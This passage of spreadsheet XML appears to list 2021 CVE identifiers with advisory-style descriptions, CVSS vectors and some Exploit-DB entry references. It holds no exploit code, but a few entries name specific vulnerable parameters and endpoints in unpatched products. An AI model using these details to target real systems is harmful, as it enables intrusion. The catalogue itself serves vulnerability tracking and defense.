    <t>A race condition was addressed with improved locking. This issue is fixed in macOS Monterey 12.1, Security Update 2021-008 Catalina, macOS Big Sur 11.6.2. A remote attacker may be able to cause unexpected application termination or heap corruption.</t>
  </si>
  <si>
    <t>CVE-2021-30983</t>
  </si>
  <si>
    <t>A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 15.2 and iPadOS 15.2. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30984</t>
  </si>
  <si>
    <t>A race condition was addressed with improved state handling. This issue is fixed in tvOS 15.2, macOS Monterey 12.1, Safari 15.2, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30985</t>
  </si>
  <si>
    <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 15.2 and iPadOS 15.2. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30986</t>
  </si>
  <si>
    <t>A device configuration issue was addressed with an updated configuration. This issue is fixed in macOS Monterey 12.1. A device may be passively tracked by its Bluetooth MAC address.</t>
  </si>
  <si>
    <t>CVE-2021-30987</t>
  </si>
  <si>
    <t>An access issue was addressed with improved access restrictions. This issue is fixed in macOS Monterey 12.1. A device may be passively tracked via BSSIDs.</t>
  </si>
  <si>
    <t>CVE-2021-30988</t>
  </si>
  <si>
    <t>Description: A permissions issue was addressed with improved validation. This issue is fixed in iOS 15.2 and iPadOS 15.2. A malicious application may be able to identify what other applications a user has installed.</t>
  </si>
  <si>
    <t>CVE-2021-30990</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved validation. This issue is fixed in macOS Monterey 12.1, Security Update 2021-008 Catalina, macOS Big Sur 11.6.2. A malicious application may bypass Gatekeeper checks.</t>
  </si>
  <si>
    <t>CVE-2021-30991</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 15.2 and iPadOS 15.2. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30992</t>
  </si>
  <si>
    <t>This issue was addressed with improved handling of file metadata. This issue is fixed in iOS 15.2 and iPadOS 15.2. A user in a FaceTime call may unexpectedly leak sensitive user information through Live Photos metadata.</t>
  </si>
  <si>
    <t>CVE-2021-30993</t>
  </si>
  <si>
    <t>A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.1, watchOS 8.3, iOS 15.2 and iPadOS 15.2, tvOS 15.2. An attacker in a privileged network position may be able to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-30994</t>
  </si>
  <si>
    <t>An access issue was addressed with improved access restrictions. This issue is fixed in macOS Monterey 12.0.1. A malicious application may be able to access local users' Apple IDs.</t>
  </si>
  <si>
    <t>CVE-2021-30995</t>
  </si>
  <si>
    <t>A race condition was addressed with improved state handling. This issue is fixed in macOS Big Sur 11.6.2, tvOS 15.2, macOS Monterey 12.1, Security Update 2021-008 Catalina, iOS 15.2 and iPadOS 15.2, watchOS 8.3. A malicious application may be able to elevate privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30996</t>
  </si>
  <si>
    <t>A race condition was addressed with improved state handling. This issue is fixed in macOS Monterey 12.1, iOS 15.2 and iPadOS 15.2. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30997</t>
  </si>
  <si>
    <t>A S/MIME issue existed in the handling of encrypted email. This issue was addressed by not automatically loading some MIME parts. This issue is fixed in iOS 15.2 and iPadOS 15.2. An attacker may be able to recover plaintext contents of an S/MIME-encrypted e-mail.</t>
  </si>
  <si>
    <t>CVE-2021-30998</t>
  </si>
  <si>
    <t>A S/MIME issue existed in the handling of encrypted email. This issue was addressed with improved selection of the encryption certificate. This issue is fixed in iOS 15.2 and iPadOS 15.2. A sender's email address may be leaked when sending an S/MIME encrypted email using a certificate with more than one email address.</t>
  </si>
  <si>
    <t>CVE-2021-30999</t>
  </si>
  <si>
    <t>The issue was addressed with improved permissions logic. This issue is fixed in iOS 14.6 and iPadOS 14.6. A user may be unable to fully delete browsing history.</t>
  </si>
  <si>
    <t>CVE-2021-3100</t>
  </si>
  <si>
    <t>The Apache Log4j hotpatch package before log4j-cve-2021-44228-hotpatch-1.1-13 didn’t mimic the permissions of the JVM being patched, allowing it to escalate privileges.</t>
  </si>
  <si>
    <t>CVE-2021-31000</t>
  </si>
  <si>
    <t>A permissions issue was addressed with improved validation. This issue is fixed in iOS 15.2 and iPadOS 15.2, watchOS 8.3, macOS Monterey 12.1, tvOS 15.2. A malicious application may be able to read sensitive contact information.</t>
  </si>
  <si>
    <t>CVE-2021-31001</t>
  </si>
  <si>
    <t>An access issue was addressed with improved access restrictions. This issue is fixed in iOS 15 and iPadOS 15. An attacker in a privileged network position may be able to leak sensitive user information.</t>
  </si>
  <si>
    <t>CVE-2021-31002</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Monterey 12.0.1, macOS Big Sur 11.6.2. A malicious application may be able to execute arbitrary code with system privileges.</t>
  </si>
  <si>
    <t>CVE-2021-31004</t>
  </si>
  <si>
    <t>A race condition was addressed with improved locking. This issue is fixed in macOS Monterey 12.0.1, macOS Big Sur 11.5. An application may be able to gain elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2021-31005</t>
  </si>
  <si>
    <t>Description: A logic issue was addressed with improved state management. This issue is fixed in iOS 15 and iPadOS 15, macOS Monterey 12.0.1. Turning off "Block all remote content" may not apply to all remote content types.</t>
  </si>
  <si>
    <t>CVE-2021-31006</t>
  </si>
  <si>
    <t>Description: A permissions issue was addressed with improved validation. This issue is fixed in watchOS 7.6, tvOS 14.7, macOS Big Sur 11.5. A malicious application may be able to bypass certain Privacy preferences.</t>
  </si>
  <si>
    <t>CVE-2021-31007</t>
  </si>
  <si>
    <t>Description: A permissions issue was addressed with improved validation. This issue is fixed in iOS 15.1 and iPadOS 15.1, tvOS 15.1, macOS Big Sur 11.6.2, watchOS 8.1, macOS Monterey 12.1. A malicious application may be able to bypass Privacy preferences.</t>
  </si>
  <si>
    <t>CVE-2021-31008</t>
  </si>
  <si>
    <t>A type confusion issue was addressed with improved memory handling. This issue is fixed in Safari 15.1, tvOS 15.1, iOS 15 and iPadOS 15, macOS Monterey 12.0.1, watchOS 8.1. Processing maliciously crafted web content may lead to code execution.</t>
  </si>
  <si>
    <t>CVE-2021-31009</t>
  </si>
  <si>
    <t>Multiple issues were addressed by removing HDF5. This issue is fixed in iOS 15.2 and iPadOS 15.2, macOS Monterey 12.1. Multiple issues in HDF5.</t>
  </si>
  <si>
    <t>CVE-2021-3101</t>
  </si>
  <si>
    <t>Hotdog, prior to v1.0.1, did not mimic the capabilities or the SELinux label of the target JVM process. This would allow a container to gain full privileges on the host, bypassing restrictions set on the container.</t>
  </si>
  <si>
    <t>CVE-2021-31010</t>
  </si>
  <si>
    <t>A deserialization issue was addressed through improved validation. This issue is fixed in Security Update 2021-005 Catalina, iOS 12.5.5, iOS 14.8 and iPadOS 14.8, macOS Big Sur 11.6, watchOS 7.6.2. A sandboxed process may be able to circumvent sandbox restrictions. Apple was aware of a report that this issue may have been actively exploited at the time of release..</t>
  </si>
  <si>
    <t>CVE-2021-31013</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.1, iOS 15.2 and iPadOS 15.2, macOS Big Sur 11.6.2. Processing a maliciously crafted font may result in the disclosure of process memory.</t>
  </si>
  <si>
    <t>CVE-2021-3109</t>
  </si>
  <si>
    <t>The custom menu item options page in SolarWinds Orion Platform before 2020.2.5 allows Reverse Tabnabbing in the context of an administrator account.</t>
  </si>
  <si>
    <t>CVE-2021-3110</t>
  </si>
  <si>
    <t>The store system in PrestaShop 1.7.7.0 allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter.</t>
  </si>
  <si>
    <t>CVE-2021-3111</t>
  </si>
  <si>
    <t>The Express Entries Dashboard in Concrete5 8.5.4 allows stored XSS via the name field of a new data object at an index.php/dashboard/express/entries/view/ URI.</t>
  </si>
  <si>
    <t>exploits/php/webapps/49721.txt</t>
  </si>
  <si>
    <t>Concrete5 8.5.4 - 'name' Stored XSS</t>
  </si>
  <si>
    <t>CVE-2021-3113</t>
  </si>
  <si>
    <t>Netsia SEBA+ through 0.16.1 build 70-e669dcd7 allows remote attackers to discover session cookies via a direct /session/list/allActiveSession request. For example, the attacker can discover the admin's cookie if the admin account happens to be logged in when the allActiveSession request occurs, and can then use that cookie immediately for admin access,</t>
  </si>
  <si>
    <t>CVE-2021-3114</t>
  </si>
  <si>
    <t>In Go before 1.14.14 and 1.15.x before 1.15.7, crypto/elliptic/p224.go can generate incorrect outputs, related to an underflow of the lowest limb during the final complete reduction in the P-224 field.</t>
  </si>
  <si>
    <t>CVE-2021-3115</t>
  </si>
  <si>
    <t>Go before 1.14.14 and 1.15.x before 1.15.7 on Windows is vulnerable to Command Injection and remote code execution when using the "go get" command to fetch modules that make use of cgo (for example, cgo can execute a gcc program from an untrusted download).</t>
  </si>
  <si>
    <t>exploits/java/webapps/50027.py</t>
  </si>
  <si>
    <t>Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration</t>
  </si>
  <si>
    <t>2021-06-17</t>
  </si>
  <si>
    <t>CVE-2021-31152</t>
  </si>
  <si>
    <t>Multilaser Router AC1200 V02.03.01.45_pt contains a cross-site request forgery (CSRF) vulnerability. An attacker can enable remote access, change passwords, and perform other actions through misconfigured requests, entries, and headers.</t>
  </si>
  <si>
    <t>CVE-2021-31153</t>
  </si>
  <si>
    <t>please before 0.4 allows a local unprivileged attacker to gain knowledge about the existence of files or directories in privileged locations via the search_path function, the --check option, or the -d option.</t>
  </si>
  <si>
    <t>CVE-2021-31154</t>
  </si>
  <si>
    <t>pleaseedit in please before 0.4 uses predictable temporary filenames in /tmp and the target directory. This allows a local attacker to gain full root privileges by staging a symlink attack.</t>
  </si>
  <si>
    <t>CVE-2021-31155</t>
  </si>
  <si>
    <t>Failure to normalize the umask in please before 0.4 allows a local attacker to gain full root privileges if they are allowed to execute at least one command.</t>
  </si>
  <si>
    <t>CVE-2021-31158</t>
  </si>
  <si>
    <t>In the Query Engine in Couchbase Server 6.5.x and 6.6.x through 6.6.1, Common Table Expression queries were not correctly checking the user's permissions, allowing read-access to resources beyond what those users were explicitly allowed to access.</t>
  </si>
  <si>
    <t>CVE-2021-31159</t>
  </si>
  <si>
    <t>Zoho ManageEngine ServiceDesk Plus MSP before 10519 is vulnerable to a User Enumeration bug due to improper error-message generation in the Forgot Password functionality, aka SDPMSP-15732.</t>
  </si>
  <si>
    <t>CVE-2021-3116</t>
  </si>
  <si>
    <t>before_upstream_connection in AuthPlugin in http/proxy/auth.py in proxy.py before 2.3.1 accepts incorrect Proxy-Authorization header data because of a boolean confusion (and versus or).</t>
  </si>
  <si>
    <t>CVE-2021-31160</t>
  </si>
  <si>
    <t>Zoho ManageEngine ServiceDesk Plus MSP before 10521 allows an attacker to access internal data.</t>
  </si>
  <si>
    <t>CVE-2021-31162</t>
  </si>
  <si>
    <t>In the standard library in Rust before 1.52.0, a double free can occur in the Vec::from_iter function if freeing the element panics.</t>
  </si>
  <si>
    <t>CVE-2021-31164</t>
  </si>
  <si>
    <t>Apache Unomi prior to version 1.5.5 allows CRLF log injection because of the lack of escaping in the log statements.</t>
  </si>
  <si>
    <t>CVE-2021-31165</t>
  </si>
  <si>
    <t>Windows Container Manager Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31167, CVE-2021-31168, CVE-2021-31169, CVE-2021-31208.</t>
  </si>
  <si>
    <t>CVE-2021-31166</t>
  </si>
  <si>
    <t>HTTP Protocol Stack Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31167</t>
  </si>
  <si>
    <t>Windows Container Manager Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31165, CVE-2021-31168, CVE-2021-31169, CVE-2021-31208.</t>
  </si>
  <si>
    <t>CVE-2021-31168</t>
  </si>
  <si>
    <t>Windows Container Manager Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31165, CVE-2021-31167, CVE-2021-31169, CVE-2021-31208.</t>
  </si>
  <si>
    <t>CVE-2021-31169</t>
  </si>
  <si>
    <t>Windows Container Manager Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31165, CVE-2021-31167, CVE-2021-31168, CVE-2021-31208.</t>
  </si>
  <si>
    <t>CVE-2021-31170</t>
  </si>
  <si>
    <t>Windows Graphics Component Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31188.</t>
  </si>
  <si>
    <t>CVE-2021-31171</t>
  </si>
  <si>
    <t>CVE-2021-31172</t>
  </si>
  <si>
    <t>Microsoft SharePoint Spoofing Vulnerability This CVE ID is unique from CVE-2021-26418, CVE-2021-28478.</t>
  </si>
  <si>
    <t>CVE-2021-31173</t>
  </si>
  <si>
    <t>Microsoft SharePoint Server Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31174</t>
  </si>
  <si>
    <t>CVE-2021-31175</t>
  </si>
  <si>
    <t>Microsoft Office Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31176, CVE-2021-31177, CVE-2021-31179.</t>
  </si>
  <si>
    <t>CVE-2021-31176</t>
  </si>
  <si>
    <t>Microsoft Office Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31175, CVE-2021-31177, CVE-2021-31179.</t>
  </si>
  <si>
    <t>CVE-2021-31177</t>
  </si>
  <si>
    <t>Microsoft Office Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31175, CVE-2021-31176, CVE-2021-31179.</t>
  </si>
  <si>
    <t>CVE-2021-31178</t>
  </si>
  <si>
    <t>Microsoft Office Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31179</t>
  </si>
  <si>
    <t>Microsoft Office Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31175, CVE-2021-31176, CVE-2021-31177.</t>
  </si>
  <si>
    <t>CVE-2021-3118</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** EVOLUCARE ECSIMAGING (aka ECS Imaging) through 6.21.5 has multiple SQL Injection issues in the login form and the password-forgotten form (such as /req_password_user.php?email=). This allows an attacker to steal data in the database and obtain access to the application. (The database component runs as root.) NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2021-31180</t>
  </si>
  <si>
    <t>Microsoft Office Graphics Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31181</t>
  </si>
  <si>
    <t>CVE-2021-31182</t>
  </si>
  <si>
    <t>Microsoft Bluetooth Driver Spoofing Vulnerability</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2021-31183</t>
  </si>
  <si>
    <t>Windows TCP/IP Driver Denial of Service Vulnerability This CVE ID is unique from CVE-2021-33772, CVE-2021-34490.</t>
  </si>
  <si>
    <t>CVE-2021-31184</t>
  </si>
  <si>
    <t>Microsoft Windows Infrared Data Association (IrDA) Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31185</t>
  </si>
  <si>
    <t>Windows Desktop Bridge Denial of Service Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31186</t>
  </si>
  <si>
    <t>Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31187</t>
  </si>
  <si>
    <t>CVE-2021-31188</t>
  </si>
  <si>
    <t>Windows Graphics Component Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31170.</t>
  </si>
  <si>
    <t>CVE-2021-3119</t>
  </si>
  <si>
    <t>Zetetic SQLCipher 4.x before 4.4.3 has a NULL pointer dereferencing issue related to sqlcipher_export in crypto.c and sqlite3StrICmp in sqlite3.c. This may allow an attacker to perform a remote denial of service attack. For example, an SQL injection can be used to execute the crafted SQL command sequence, which causes a segmentation fault.</t>
  </si>
  <si>
    <t>CVE-2021-31190</t>
  </si>
  <si>
    <t>Windows Container Isolation FS Filter Driver Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31191</t>
  </si>
  <si>
    <t>Windows Projected File System FS Filter Driver Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31192</t>
  </si>
  <si>
    <t>Windows Media Foundation Core Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31193</t>
  </si>
  <si>
    <t>Windows SSDP Service Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31194</t>
  </si>
  <si>
    <t>OLE Automation Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31195</t>
  </si>
  <si>
    <t>Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31198.</t>
  </si>
  <si>
    <t>CVE-2021-31196</t>
  </si>
  <si>
    <t>Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31206, CVE-2021-34473.</t>
  </si>
  <si>
    <t>CVE-2021-31198</t>
  </si>
  <si>
    <t>Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31195.</t>
  </si>
  <si>
    <t>CVE-2021-31199</t>
  </si>
  <si>
    <t>Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31201.</t>
  </si>
  <si>
    <t>CVE-2021-3120</t>
  </si>
  <si>
    <t>An arbitrary file upload vulnerability in the YITH WooCommerce Gift Cards Premium plugin before 3.3.1 for WordPress allows remote attackers to achieve remote code execution on the operating system in the security context of the web server. In order to exploit this vulnerability, an attacker must be able to place a valid Gift Card product into the shopping cart. An uploaded file is placed at a predetermined path on the web server with a user-specified filename and extension. This occurs because the ywgc-upload-picture parameter can have a .php value even though the intention was to only allow uploads of Gift Card images.</t>
  </si>
  <si>
    <t>CVE-2021-31200</t>
  </si>
  <si>
    <t>Common Utilities Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31201</t>
  </si>
  <si>
    <t>Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31199.</t>
  </si>
  <si>
    <t>CVE-2021-31204</t>
  </si>
  <si>
    <t>.NET and Visual Studio Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31205</t>
  </si>
  <si>
    <t>Windows SMB Client Security Feature Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31206</t>
  </si>
  <si>
    <t>Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-34473.</t>
  </si>
  <si>
    <t>CVE-2021-31207</t>
  </si>
  <si>
    <t>Microsoft Exchange Server Security Feature Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31208</t>
  </si>
  <si>
    <t>Windows Container Manager Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31165, CVE-2021-31167, CVE-2021-31168, CVE-2021-31169.</t>
  </si>
  <si>
    <t>CVE-2021-31209</t>
  </si>
  <si>
    <t>Microsoft Exchange Server Spoofing Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-3121</t>
  </si>
  <si>
    <t>An issue was discovered in GoGo Protobuf before 1.3.2. plugin/unmarshal/unmarshal.go lacks certain index validation, aka the "skippy peanut butter" issue.</t>
  </si>
  <si>
    <t>CVE-2021-31211</t>
  </si>
  <si>
    <t>Visual Studio Code Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31214.</t>
  </si>
  <si>
    <t>CVE-2021-31213</t>
  </si>
  <si>
    <t>Visual Studio Code Remote Containers Extension Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31214</t>
  </si>
  <si>
    <t>Visual Studio Code Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31211.</t>
  </si>
  <si>
    <t>CVE-2021-31215</t>
  </si>
  <si>
    <t>SchedMD Slurm before 20.02.7 and 20.03.x through 20.11.x before 20.11.7 allows remote code execution as SlurmUser because use of a PrologSlurmctld or EpilogSlurmctld script leads to environment mishandling.</t>
  </si>
  <si>
    <t>CVE-2021-31216</t>
  </si>
  <si>
    <t>Siren Investigate before 11.1.1 contains a server side request forgery (SSRF) defect in the built-in image proxy route (which is enabled by default). An attacker with access to the Investigate installation can specify an arbitrary URL in the parameters of the image proxy route and fetch external URLs as the Investigate process on the host.</t>
  </si>
  <si>
    <t>CVE-2021-31217</t>
  </si>
  <si>
    <t>In SolarWinds DameWare Mini Remote Control Server 12.0.1.200, insecure file permissions allow file deletion as SYSTEM.</t>
  </si>
  <si>
    <t>CVE-2021-3122</t>
  </si>
  <si>
    <t>CMCAgent in NCR Command Center Agent 16.3 on Aloha POS/BOH servers permits the submission of a runCommand parameter (within an XML document sent to port 8089) that enables the remote, unauthenticated execution of an arbitrary command as SYSTEM, as exploited in the wild in 2020 and/or 2021. NOTE: the vendor's position is that exploitation occurs only on devices with a certain "misconfiguration."</t>
  </si>
  <si>
    <t>CVE-2021-31220</t>
  </si>
  <si>
    <t>SES Evolution before 2.1.0 allows modifying security policies by leveraging access of a user having read-only access to security policies.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2021-31221</t>
  </si>
  <si>
    <t>SES Evolution before 2.1.0 allows deleting some parts of a security policy by leveraging access to a computer having the administration console installed.</t>
  </si>
  <si>
    <t>CVE-2021-31222</t>
  </si>
  <si>
    <t>SES Evolution before 2.1.0 allows updating some parts of a security policy by leveraging access to a computer having the administration console installed.</t>
  </si>
  <si>
    <t>CVE-2021-31223</t>
  </si>
  <si>
    <t>SES Evolution before 2.1.0 allows reading some parts of a security policy by leveraging access to a computer having the administration console installed.</t>
  </si>
  <si>
    <t>CVE-2021-31224</t>
  </si>
  <si>
    <t>SES Evolution before 2.1.0 allows duplicating an existing security policy by leveraging access of a user having read-only access to security policies.</t>
  </si>
  <si>
    <t>CVE-2021-31225</t>
  </si>
  <si>
    <t>SES Evolution before 2.1.0 allows deleting some resources not currently in use by any security policy by leveraging access to a computer having the administration console installed.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H</t>
  </si>
  <si>
    <t>CVE-2021-31226</t>
  </si>
  <si>
    <t>An issue was discovered in HCC embedded InterNiche 4.0.1. A potential heap buffer overflow exists in the code that parses the HTTP POST request, due to lack of size validation. This vulnerability requires the attacker to send a crafted HTTP POST request with a URI longer than 50 bytes. This leads to a heap overflow in wbs_post() via an strcpy() call.</t>
  </si>
  <si>
    <t>CVE-2021-31227</t>
  </si>
  <si>
    <t>An issue was discovered in HCC embedded InterNiche 4.0.1. A potential heap buffer overflow exists in the code that parses the HTTP POST request, due to an incorrect signed integer comparison. This vulnerability requires the attacker to send a malformed HTTP packet with a negative Content-Length, which bypasses the size checks and results in a large heap overflow in the wbs_multidata buffer copy.</t>
  </si>
  <si>
    <t>CVE-2021-31228</t>
  </si>
  <si>
    <t>An issue was discovered in HCC embedded InterNiche 4.0.1. This vulnerability allows the attacker to predict a DNS query's source port in order to send forged DNS response packets that will be accepted as valid answers to the DNS client's requests (without sniffing the specific request). Data is predictable because it is based on the time of day, and has too few bits.</t>
  </si>
  <si>
    <t>CVE-2021-31229</t>
  </si>
  <si>
    <t>An issue was discovered in libezxml.a in ezXML 0.8.6. The function ezxml_internal_dtd() performs incorrect memory handling while parsing crafted XML files, which leads to an out-of-bounds write of a one byte constant.</t>
  </si>
  <si>
    <t>CVE-2021-31231</t>
  </si>
  <si>
    <t>The Alertmanager in Grafana Enterprise Metrics before 1.2.1 and Metrics Enterprise 1.2.1 has a local file disclosure vulnerability when experimental.alertmanager.enable-api is used. The HTTP basic auth password_file can be used as an attack vector to send any file content via a webhook. The alertmanager templates can be used as an attack vector to send any file content because the alertmanager can load any text file specified in the templates list.</t>
  </si>
  <si>
    <t>CVE-2021-31232</t>
  </si>
  <si>
    <t>The Alertmanager in CNCF Cortex before 1.8.1 has a local file disclosure vulnerability when -experimental.alertmanager.enable-api is used. The HTTP basic auth password_file can be used as an attack vector to send any file content via a webhook. The alertmanager templates can be used as an attack vector to send any file content because the alertmanager can load any text file specified in the templates list.</t>
  </si>
  <si>
    <t>CVE-2021-3124</t>
  </si>
  <si>
    <t>Stored cross-site scripting (XSS) in form field in robust.systems product Custom Global Variables v 1.0.5 allows a remote attacker to inject arbitrary code via the vars[0][name] field.</t>
  </si>
  <si>
    <t>CVE-2021-31245</t>
  </si>
  <si>
    <t>omr-admin.py in openmptcprouter-vps-admin 0.57.3 and earlier compares the user provided password with the original password in a length dependent manner, which allows remote attackers to guess the password via a timing attack.</t>
  </si>
  <si>
    <t>CVE-2021-31249</t>
  </si>
  <si>
    <t>A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter redirect= available on multiple CGI components.</t>
  </si>
  <si>
    <t>CVE-2021-3125</t>
  </si>
  <si>
    <t>In TP-Link TL-XDR3230 &lt; 1.0.12, TL-XDR1850 &lt; 1.0.9, TL-XDR1860 &lt; 1.0.14, TL-XDR3250 &lt; 1.0.2, TL-XDR6060 Turbo &lt; 1.1.8, TL-XDR5430 &lt; 1.0.11, and possibly others, when IPv6 is used, a routing loop can occur that generates excessive network traffic between an affected device and its upstream ISP's router. This occurs when a link prefix route points to a point-to-point link, a destination IPv6 address belongs to the prefix and is not a local IPv6 address, and a router advertisement is received with at least one global unique IPv6 prefix for which the on-link flag is set.</t>
  </si>
  <si>
    <t>exploits/hardware/remote/49936.py</t>
  </si>
  <si>
    <t>CHIYU IoT Devices - 'Telnet' Authentication Bypass</t>
  </si>
  <si>
    <t>2021-06-03</t>
  </si>
  <si>
    <t>CVE-2021-31250</t>
  </si>
  <si>
    <t>Multiple storage XSS vulnerabilities were discovered on BF-430, BF-431 and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of sanitization of the input on the components man.cgi, if.cgi, dhcpc.cgi, ppp.cgi.</t>
  </si>
  <si>
    <t>CVE-2021-31251</t>
  </si>
  <si>
    <t>An authentication bypass in telnet server in BF-430 and BF431 232/422 TCP/IP Converter, BF-450M and SEMAC from CHIYU Technology Inc allows obtaining a privileged connection with the target device by supplying a specially malformed request and an attacker may force the remote telnet server to believe that the user has already authenticated.</t>
  </si>
  <si>
    <t>CVE-2021-31252</t>
  </si>
  <si>
    <t>An open redirect vulnerability exists in BF-630, BF-450M, BF-430, BF-431, BF631-W, BF830-W, Webpass, and SEMAC devices from CHIYU Technology that can be exploited by sending a link that has a specially crafted URL to convince the user to click on it.</t>
  </si>
  <si>
    <t>CVE-2021-31254</t>
  </si>
  <si>
    <t>Buffer overflow in the tenc_box_read function in MP4Box in GPAC 1.0.1 allows attackers to cause a denial of service or execute arbitrary code via a crafted file, related invalid IV sizes.</t>
  </si>
  <si>
    <t>CVE-2021-31255</t>
  </si>
  <si>
    <t>Buffer overflow in the abst_box_read function in MP4Box in GPAC 1.0.1 allows attackers to cause a denial of service or execute arbitrary code via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-31256</t>
  </si>
  <si>
    <t>Memory leak in the stbl_GetSampleInfos function in MP4Box in GPAC 1.0.1 allows attackers to read memory via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-31257</t>
  </si>
  <si>
    <t>The HintFile function in GPAC 1.0.1 allows attackers to cause a denial of service (NULL pointer dereference) via a crafted file in the MP4Box command.</t>
  </si>
  <si>
    <t>CVE-2021-31258</t>
  </si>
  <si>
    <t>The gf_isom_set_extraction_slc function in GPAC 1.0.1 allows attackers to cause a denial of service (NULL pointer dereference) via a crafted file in the MP4Box command.</t>
  </si>
  <si>
    <t>CVE-2021-31259</t>
  </si>
  <si>
    <t>The gf_isom_cenc_get_default_info_internal function in GPAC 1.0.1 allows attackers to cause a denial of service (NULL pointer dereference) via a crafted file in the MP4Box command.</t>
  </si>
  <si>
    <t>CVE-2021-31260</t>
  </si>
  <si>
    <t>The MergeTrack function in GPAC 1.0.1 allows attackers to cause a denial of service (NULL pointer dereference) via a crafted file in the MP4Box command.</t>
  </si>
  <si>
    <t>CVE-2021-31261</t>
  </si>
  <si>
    <t>The gf_hinter_track_new function in GPAC 1.0.1 allows attackers to read memory via a crafted file in the MP4Box command.</t>
  </si>
  <si>
    <t>CVE-2021-31262</t>
  </si>
  <si>
    <t>The AV1_DuplicateConfig function in GPAC 1.0.1 allows attackers to cause a denial of service (NULL pointer dereference) via a crafted file in the MP4Box command.</t>
  </si>
  <si>
    <t>CVE-2021-3127</t>
  </si>
  <si>
    <t>NATS Server 2.x before 2.2.0 and JWT library before 2.0.1 have Incorrect Access Control because Import Token bindings are mishandled.</t>
  </si>
  <si>
    <t>CVE-2021-31272</t>
  </si>
  <si>
    <t>SerenityOS before commit 3844e8569689dd476064a0759d704bc64fb3ca2c contains a directory traversal vulnerability in tar/unzip that may lead to command execution or privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2021-31274</t>
  </si>
  <si>
    <t>In LibreNMS &lt; 21.3.0, a stored XSS vulnerability was identified in the API Access page due to insufficient sanitization of the $api-&gt;description variable. As a result, arbitrary Javascript code can get executed.</t>
  </si>
  <si>
